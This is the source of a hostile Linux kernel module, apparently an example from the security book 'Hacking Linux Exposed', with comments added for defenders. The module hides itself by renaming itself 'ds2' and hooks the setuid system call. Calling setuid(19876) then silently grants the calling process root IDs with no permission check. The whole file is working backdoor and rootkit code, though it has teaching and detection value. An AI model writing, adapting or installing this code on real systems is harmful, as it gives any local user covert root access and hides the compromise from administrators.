Hacking Linux Exposed


/*
 * Example hostile Linux loadable kernel module
 *
 * Copyright 2001, Bri Hatch
 * Released under the GPL.
 *
 * Note: there are zillions of ways to do this.
 * Have fun, program your own, and learn a bit about
 * kernel games.
 *
 */

#define __KERNEL__
#define MODULE

#include <linux/config.h>
#include <linux/module.h>
#include <linux/version.h>
#include <sys/syscall.h>

#include <linux/sched.h>
#include <linux/types.h>


/* Forward declaration of the replacement setuid handler defined later in
   this file. */
int new_setuid(uid_t);
/* Holds the original sys_call_table[ SYS_setuid ] entry. init_module()
   saves it here so new_setuid() can forward ordinary calls and
   cleanup_module() can put it back. */
int (*real_setuid)(uid_t);
/* The kernel's system call dispatch table, referenced as an external
   symbol. The module can only load on a kernel that makes this symbol
   available to modules. */
extern void *sys_call_table[];


/*
 * Module load hook. Does two things, in this order:
 *   1. overwrites the first four bytes of the module's own name with
 *      "ds2" plus a terminating NUL;
 *   2. saves the current setuid entry of sys_call_table in real_setuid
 *      and replaces it with new_setuid.
 * Always returns 0.
 *
 * What a defender can observe from this: the name shown for the loaded
 * module no longer matches the object file it came from, and the setuid
 * slot of the system call table no longer holds its original value.
 * Comparing the table against a known-good baseline for the running
 * kernel exposes the second change.
 */
int init_module() {

      /* Change our module name to hide a bit. It'll
         help prevent it from being found on disk. */

      /* mp is bound to the %ebx register and is never assigned, so the
         code uses whatever value that register holds on entry.
         NOTE(review): presumably the module loader of the targeted
         kernel leaves the struct module pointer there -- nothing in
         this file establishes that; confirm before relying on it. */
      register struct module *mp asm("%ebx");
      /* Byte-wise overwrite of the name through a cast to char *. */
      *(char *) (mp->name)   = 'd';
      *(char *) (mp->name+1) = 's';
      *(char *) (mp->name+2) = '2';
      *(char *) (mp->name+3) = '\0';

      /* Save the original handler first, then install the replacement;
         new_setuid() and cleanup_module() both depend on the saved
         pointer. */
      real_setuid   = sys_call_table[ SYS_setuid ];
      sys_call_table[ SYS_setuid ]   =  (void *)new_setuid;
      return 0;
}

/*
 * Module unload hook: writes the handler pointer saved in real_setuid
 * back into the setuid slot of sys_call_table, undoing the hook that
 * init_module() installed. The module name change is not reverted here.
 * Always returns 0.
 */
int cleanup_module() {
      void *saved_entry = (void *)real_setuid;

      sys_call_table[ SYS_setuid ] = saved_entry;
      return 0;
}

/*
 * Replacement handler that init_module() installs in the setuid slot of
 * sys_call_table.
 *
 * uid: the argument the calling process passed to setuid().
 *
 * Returns the original handler's result for every uid except the
 * hard-coded trigger value 19876. For the trigger it sets the calling
 * task's uid, gid, euid and egid to 0 and returns 0. No permission
 * check of any kind is made on that path, so any process that can make
 * the call gets those four IDs zeroed.
 *
 * For reviewers and responders: a setuid() call with an unusual fixed
 * argument that succeeds for an unprivileged process is the visible
 * behaviour of this backdoor.
 */
int new_setuid(uid_t uid) {

      /* Ordinary requests are passed through unchanged to the saved
         original handler. */
      if ( uid != 19876 )
            return real_setuid(uid);

      /* Trigger value: zero the four credential fields this module
         touches on the current task. */
      current->euid = 0;
      current->egid = 0;
      current->uid = 0;
      current->gid = 0;
      return 0;
}